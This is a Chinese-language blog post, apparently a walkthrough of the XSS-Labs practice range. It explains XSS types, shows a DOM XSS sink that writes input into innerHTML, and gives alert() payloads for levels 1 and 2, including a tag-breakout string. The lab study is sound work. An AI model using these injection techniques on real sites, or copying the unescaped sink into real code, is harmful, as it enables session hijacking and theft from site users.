<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0"/><meta name="author" content="月岛"/><meta name="copyright" content="月岛"/><meta name="theme-color" content="#FFB347"/><meta name="format-detection" content="telephone=no"/><meta name="keywords" content="靶场练习"/><meta name="mobile-web-app-capable" content="yes"/><meta name="apple-mobile-web-app-capable" content="yes"/><meta name="apple-touch-fullscreen" content="yes"/><meta name="application-name" content="XSS-Labs靶场通关 | 月岛的博客"/><meta name="apple-mobile-web-app-title" content="XSS-Labs靶场通关 | 月岛的博客"/><meta name="apple-mobile-web-app-status-bar-style" content="#FFB347"/><link rel="canonical" href="http://example.com/2026/05/30/XSS-Labs靶场通关/"/><meta name="description" content="XSS简述跨站脚本攻击（Cross-Site Scripting，简称 XSS）是一种常见的 Web 安全漏洞。攻击者通过在网页中注入恶意的客户端脚本（如 JavaScript），当其他用户浏览该网页时，浏览器会执行这些恶意代码。这使得攻击者能够窃取敏感数据（如 Cookie、会话令牌）、劫持用户会话或冒充用户执行操作。 XSS 的常见类型 存储型（持久型）：恶意脚本永久存储在目标服务器的数...">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS-Labs靶场通关 | 月岛的博客">
<meta property="og:url" content="http://example.com/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/index.html">
<meta property="og:site_name" content="月岛的博客">
<meta property="og:description" content="XSS简述跨站脚本攻击（Cross-Site Scripting，简称 XSS）是一种常见的 Web 安全漏洞。攻击者通过在网页中注入恶意的客户端脚本（如 JavaScript），当其他用户浏览该网页时，浏览器会执行这些恶意代码。这使得攻击者能够窃取敏感数据（如 Cookie、会话令牌）、劫持用户会话或冒充用户执行操作。 XSS 的常见类型 存储型（持久型）：恶意脚本永久存储在目标服务器的数...">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/assets/images/Hexo-Theme-MEOW.png">
<meta property="article:published_time" content="2026-05-30T06:41:25.000Z">
<meta property="article:modified_time" content="2026-06-02T08:18:38.752Z">
<meta property="article:author" content="月岛">
<meta property="article:tag" content="靶场练习">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://example.com/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/assets/images/Hexo-Theme-MEOW.png"><meta name="robots" content="index,follow"/><meta name="googlebot" content="index,follow"/><meta name="revisit-after" content="1 days"/><title>XSS-Labs靶场通关 | 月岛的博客</title><link rel="shortcut icon" href="/assets/images/Hexo-Theme-MEOW.ico"><link rel="preconnect" href="/assets"/><link rel="preconnect" href="assets"/>
<link rel="stylesheet" href="/css/style.css">

<link rel="stylesheet" href="/css/third-party/dist/APlayer.min.css">

<link rel="stylesheet" href="/css/third-party/dist/snackbar.min.css">
<link rel="prefetch" href="/"/><link rel="prefetch" href="/archives"/><link rel="prefetch" href="/tags"/><meta name="generator" content="Hexo 8.1.1"></head><body bg-style="none"><div class="post-progressbar-container"><div class="post-progressbar"></div></div><header><div id="navbar"><div id="nav-info"><a id="site-icon" href="/" title="Home"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a id="site-name" href="/" title="Home"><div>月岛的博客</div><img src="/assets/images/svg/uc/uc-home.svg" class="icon noview" alt="Icon"></a></div><div id="nav-menu"><div class="menu-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>Categories</span></a></div><div class="menu-item"><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>Tags</span></a></div><div class="menu-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>About</span></a></div></div><div id="nav-function"><div id="menu-btn"><a href="javascript:void(0);" title="Toggle Menu"><img src="/assets/images/svg/uc/uc-menu.svg" class="icon noview" alt="Icon"></a></div></div></div></header><div id="menu-aside"><div id="menu-aside-container"><div id="menu-aside-info"><a href="/" title="Home"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Logo"/></a><a href="/" title="Home">月岛的博客</a></div><div class="menu-aside-item"><a href="/categories"><img src="/assets/images/svg/uc/uc-category.svg" class="icon noview" alt="Icon"><span>Categories</span></a></div><div class="menu-aside-item"><a href="/tags"><img src="/assets/images/svg/uc/uc-tag.svg" class="icon noview" alt="Icon"><span>Tags</span></a></div><div class="menu-aside-item"><a href="/about"><img src="/assets/images/svg/uc/uc-about.svg" class="icon noview" alt="Icon"><span>About</span></a></div><hr/></div></div><main><div class="banner"><div class="banner-info"><div class="banner-avatar"><img src="/assets/images/Hexo-Theme-MEOW.png" alt="Avatar"/></div><div class="banner-title">「 MEOW 」</div></div></div><div class="post-container"><div class="post-main"><div class="post-content"><h1 class="post-title">XSS-Labs靶场通关</h1><div class="post-author"><span>Author: 月岛</span></div><div class="post-meta"><div class="post-info"><div class="post-date"><div class="post-pubdate"><img src="/assets/images/svg/ta/ta-pubdate.svg" class="icon noview" alt="Icon"><span>Created: 2026-05-30</span></div><div class="post-update"><img src="/assets/images/svg/ta/ta-update.svg" class="icon noview" alt="Icon"><span>Updated: 2026-06-02</span></div></div><div class="post-read"><div class="post-pageview"><img src="/assets/images/svg/ta/ta-fire.svg" class="icon noview" alt="Icon"><span>Hits: </span><span id="vercount_value_page_pv"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none"  stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M12 6l0 -3" /><path d="M16.25 7.75l2.15 -2.15" /><path d="M18 12l3 0" /><path d="M16.25 16.25l2.15 2.15" /><path d="M12 18l0 3" /><path d="M7.75 16.25l-2.15 2.15" /><path d="M6 12l-3 0" /><path d="M7.75 7.75l-2.15 -2.15" /></svg></span></div></div></div><div class="post-attribute"><div class="post-tags"><img src="/assets/images/svg/ta/ta-tag.svg" class="icon noview" alt="Icon"><span><a class="post-tags-link" href="/tags/%E9%9D%B6%E5%9C%BA%E7%BB%83%E4%B9%A0/" rel="tag">靶场练习</a></span></div></div></div><div class="post markdown" indent="false"><h3 id="XSS简述"><a href="#XSS简述" class="headerlink" title="XSS简述"></a>XSS简述</h3><p><strong>跨站脚本攻击</strong>（Cross-Site Scripting，简称 <strong>XSS</strong>）是一种常见的 Web 安全漏洞。攻击者通过在网页中注入恶意的客户端脚本（如 JavaScript），当其他用户浏览该网页时，浏览器会执行这些恶意代码。这使得攻击者能够窃取敏感数据（如 Cookie、会话令牌）、劫持用户会话或冒充用户执行操作。</p>
<h4 id="XSS-的常见类型"><a href="#XSS-的常见类型" class="headerlink" title="XSS 的常见类型"></a>XSS 的常见类型</h4><ul>
<li><strong>存储型（持久型）</strong>：恶意脚本永久存储在目标服务器的数据库中（例如在评论区或个人资料中）。当用户查看相关页面时触发。</li>
<li><strong>反射型（非持久型）</strong>：恶意脚本包含在发送给用户的请求中（例如恶意链接或搜索参数），当用户点击或提交表单时，服务器将其反射执行。</li>
<li><strong>基于 DOM 型</strong>：恶意代码并不依赖服务器，而是由于前端 JavaScript 代码在处理用户输入时存在安全缺陷，导致直接在浏览器中被执行</li>
</ul>
<h3 id="DOM简述"><a href="#DOM简述" class="headerlink" title="DOM简述"></a>DOM简述</h3><p><em>DOM (Document Object Model) 译为</em><strong>文档对象模型</strong><em>，是 HTML 和 XML 文档的编程接口。</em></p>
<p>HTML DOM 树形结构:</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="https://www.runoob.com/images/htmltree.gif"  alt="DOM HTML tree"></p>
<h5 id="实例"><a href="#实例" class="headerlink" title="实例:"></a>实例:</h5><div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">document.write(&quot;Hello World!&quot;)</span><br><span class="line">&lt;/script&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>一些常用的 HTML DOM 方法：</p>
<ul>
<li>getElementById(id) - 获取带有指定 id 的节点（元素）</li>
<li>appendChild(node) - 插入新的子节点（元素）</li>
<li>removeChild(node) - 删除子节点（元素）</li>
<li>getElementsByTagName() 返回带有指定标签名的所有元素。</li>
</ul>
<p>一些常用的 HTML DOM 属性：</p>
<ul>
<li>innerHTML - 节点（元素）的文本值</li>
<li>parentNode - 节点（元素）的父节点</li>
<li>childNodes - 节点（元素）的子节点</li>
<li>attributes - 节点（元素）的属性节点</li>
</ul>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">&lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">&lt;title&gt;菜鸟教程(runoob.com)&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line"></span><br><span class="line">&lt;a name=&quot;html&quot;&gt;HTML 教程&lt;/a&gt;&lt;br&gt;</span><br><span class="line">&lt;a name=&quot;css&quot;&gt;CSS 教程&lt;/a&gt;&lt;br&gt;</span><br><span class="line">&lt;a name=&quot;xml&quot;&gt;XML 教程&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">&lt;p&gt;文档中第一个锚:</span><br><span class="line">&lt;script&gt;</span><br><span class="line">document.write(document.anchors[0].innerHTML);</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;/p&gt;</span><br><span class="line"></span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>运行结果：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HTML 教程</span><br><span class="line">CSS 教程</span><br><span class="line">XML 教程</span><br><span class="line">文档中第一个锚: HTML 教程</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<h5 id="DOM-XSS实例："><a href="#DOM-XSS实例：" class="headerlink" title="DOM XSS实例："></a>DOM XSS实例：</h5><div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">&lt;div class=&quot;page-content&quot;&gt;</span><br><span class="line"> </span><br><span class="line">	&lt;div id=&quot;xssd_main&quot;&gt;</span><br><span class="line">        &lt;script&gt;</span><br><span class="line">            function domxss()&#123;</span><br><span class="line">                var str = document.getElementById(&quot;text&quot;).value;  //获取输入字符串</span><br><span class="line">                document.getElementById(&quot;dom&quot;).innerHTML = &quot;&lt;a href=&#x27;&quot;+str+&quot;&#x27;&gt;what do you see?&lt;/a&gt;&quot;;   //制造一个innerhtml，在what do you see加上超链接，链接内容就是你输入的字符串。</span><br><span class="line">            &#125;</span><br><span class="line"> </span><br><span class="line">        &lt;/script&gt;</span><br><span class="line"> </span><br><span class="line">        // 下面是一个点击提交的功能，之后触发domxss()方法</span><br><span class="line">        &lt;!--&lt;a href=&quot;&quot; onclick=(&#x27;xss&#x27;)&gt;--&gt;</span><br><span class="line">        &lt;input id=&quot;text&quot; name=&quot;text&quot; type=&quot;text&quot;  value=&quot;&quot; /&gt;</span><br><span class="line">        &lt;input id=&quot;button&quot; type=&quot;button&quot; value=&quot;click me!&quot; onclick=&quot;domxss()&quot; /&gt;</span><br><span class="line">		&lt;div id=&quot;dom&quot;&gt;&lt;/div&gt;</span><br><span class="line">    &lt;/div&gt;</span><br><span class="line"> </span><br><span class="line"> </span><br><span class="line">&lt;/div&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>触发xss：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascript:alert(1)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<h5 id="反射型xss和DOM型xss区别"><a href="#反射型xss和DOM型xss区别" class="headerlink" title="反射型xss和DOM型xss区别"></a>反射型xss和DOM型xss区别</h5><p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260531123244803.png"  alt="image-20260531123244803"></p>
<h3 id="level1"><a href="#level1" class="headerlink" title="level1"></a>level1</h3><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260530150152952.png"  alt="image-20260530150152952" style="zoom:50%;" >

<p>查看源码，对alert函数进行了重新，当浏览器执行alert函数时，会跳转到第二关</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530144306937.png"  alt="image-20260530144306937"></p>
<p>控制台输入</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">window.alert(111)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530145106718.png"  alt="image-20260530145106718"></p>
<p>成功跳转到第二关</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530145217649.png"  alt="image-20260530145217649"></p>
<p>😅kidding</p>
<p>参数name的值会插入到源码中</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530145607513.png"  alt="image-20260530145607513"></p>
<p>在name处尝试xss</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;alert(11)&lt;/script&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>



<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530144306937.png"  alt="image-20260530144306937"></p>
<p>插入的script标签被解析,成功触发xss</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level1&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level1&lt;/h1&gt;</span><br><span class="line">&lt;h2 align=center&gt;欢迎用户&lt;script&gt;alert(11)&lt;/script&gt;&lt;/h2&gt;&lt;center&gt;&lt;img src=level1.png&gt;&lt;/center&gt;</span><br><span class="line">&lt;h3 align=center&gt;payload的长度:26&lt;/h3&gt;&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260530144447899.png"  alt="image-20260530144447899" style="zoom:80%;" >

<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="image-20260530150127389.png"  alt="image-20260530150127389" style="zoom:50%;" >

<p>查看源码：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;title&gt;欢迎来到level2&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">&lt;h1 align=center&gt;欢迎来到level2&lt;/h1&gt;</span><br><span class="line">&lt;h2 align=center&gt;没有找到和test相关的结果.&lt;/h2&gt;&lt;center&gt;</span><br><span class="line">&lt;form action=level2.php method=GET&gt;</span><br><span class="line">&lt;input name=keyword  value=&quot;test&quot;&gt;</span><br><span class="line">&lt;input type=submit name=submit value=&quot;搜索&quot;/&gt;</span><br><span class="line">&lt;/form&gt;</span><br><span class="line">&lt;/center&gt;&lt;center&gt;&lt;img src=level2.png&gt;&lt;/center&gt;</span><br><span class="line">&lt;h3 align=center&gt;payload的长度:4&lt;/h3&gt;&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br><span class="line"></span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p>输入框的内容会插入到源码中：</p>
<p>尝试：</p>
<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530150623263.png"  alt="image-20260530150623263"></p>
<p>输入的<strong>尖括号被实体化</strong>了</p>
<p>输入框是通过keyword这个参数传进去的，尝试闭合input标签：</p>
<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;script&gt;alert(111)&lt;/script&gt;</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<p><img   lazyload src="/assets/images/Meow-Loading.webp" data-lazy-src="/2026/05/30/XSS-Labs%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/image-20260530151355059.png"  alt="image-20260530151355059"></p>
<p>成功触发xss</p>
